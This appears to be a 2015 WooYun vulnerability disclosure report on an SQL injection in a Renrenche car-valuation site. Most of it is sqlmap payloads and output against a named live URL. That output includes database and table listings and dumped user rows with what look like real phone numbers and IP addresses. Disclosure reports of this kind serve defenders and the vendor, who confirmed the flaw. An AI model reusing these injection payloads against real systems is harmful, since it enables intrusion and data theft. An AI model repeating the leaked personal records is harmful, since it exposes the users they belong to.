乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-09: 细节已通知厂商并且等待厂商处理中 2015-09-09: 厂商已经确认,细节仅向厂商公开 2015-09-19: 细节向核心白帽子及相关领域专家公开 2015-09-29: 细节向普通白帽子公开 2015-10-09: 细节向实习白帽子公开 2015-10-24: 细节向公众公开
人人车某站存在SQL注入漏洞
注入点:
http://pinggu.renrenche.com/index.php?m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119
参数:city
sqlmap跑下:
Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119 OR (SELECT 4294 FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT (ELT(4294=4294,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119 OR SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119 UNION ALL SELECT CONCAT(0x71786a7671,0x55466e6162684a635073,0x7178787071)-- ---[15:55:09] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.29back-end DBMS: MySQL 5.0[15:55:09] [INFO] fetching database names[15:55:10] [INFO] the SQL query used returns 6 entries[15:55:10] [INFO] retrieved: information_schema[15:55:10] [INFO] retrieved: mysql[15:55:10] [INFO] retrieved: performance_schema[15:55:10] [INFO] retrieved: price_evaluate_online[15:55:10] [INFO] retrieved: rrc[15:55:11] [INFO] retrieved: rrc_friendsavailable databases [6]: [*] information_schema[*] mysql[*] performance_schema[*] price_evaluate_online[*] rrc[*] rrc_friends
好像设计主站库,泄露用户信息
Database: rrc [147 tables]+----------------------------------+| backup_cm_appointment_20150815 || backup_cm_appointment_bak150312 || backup_cm_category || backup_cm_ip || backup_cm_motion || backup_cm_promo || backup_rc_auth_code_history || backup_rc_ci_sessions || backup_rc_login_attempts || backup_rc_sale_notify || backup_rc_search_filter || backup_rc_search_filter_bak || backup_rc_user_autologin || backup_rc_user_profiles || backup_rc_users || cm_58brand || cm_58chexi || cm_58chexing || cm_appointment || cm_brand || cm_brand_and_series_info_view || cm_car_info_view || cm_car_model || cm_car_series || cm_intent || cm_sold || cp_aftersale_address |
[16:05:53] [INFO] starting 5 threads[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5927\\\\u8fde","0000-00-00 00:00:00","[email protected]","1024","100.97.137.72","2015-09-09 16:02:58","13604082047","20...[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5168\\\\u56fd","0000-00-00 00:00:00","[email protected]","1025","100.97.135.248","2015-09-09 08:06:32","13522382635","...[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u5408\\\\u80a5","0000-00-00 00:00:00","[email protected]","1026","","0000-00-00 00:00:00","13515606138","2015-08-14 15:51:2...[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u4f5b\\\\u5c71","0000-00-00 00:00:00","[email protected]","1027","","0000-00-00 00:00:00","18927279047","2015-08-14 18:0...[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u6df1\\\\u5733","0000-00-00 00:00:00","[email protected]","1031","","0000-00-00 00:00:00","13927488838","2015-08-16 21...[16:05:55] [INFO] retrieved: "1"," ","0","\\\\u90d1\\\\u5dde","0000-00-00 00:00:00","[email protected]","1030","100.97.135.162","2015-09-09 10:07:56","15981804406",...[16:05:56] [INFO] retrieved: "1"," ","0","\\\\u4e1c\\\\u839e","0000-00-00 00:00:00","[email protected]","1032","100.97.136.239","2015-09-09 10:58:34","18688842824
ctrl+c掉,没继续跑了。。。
过滤下下。
危害等级:高
漏洞Rank:12
确认时间:2015-09-09 17:18
非常感谢!
暂无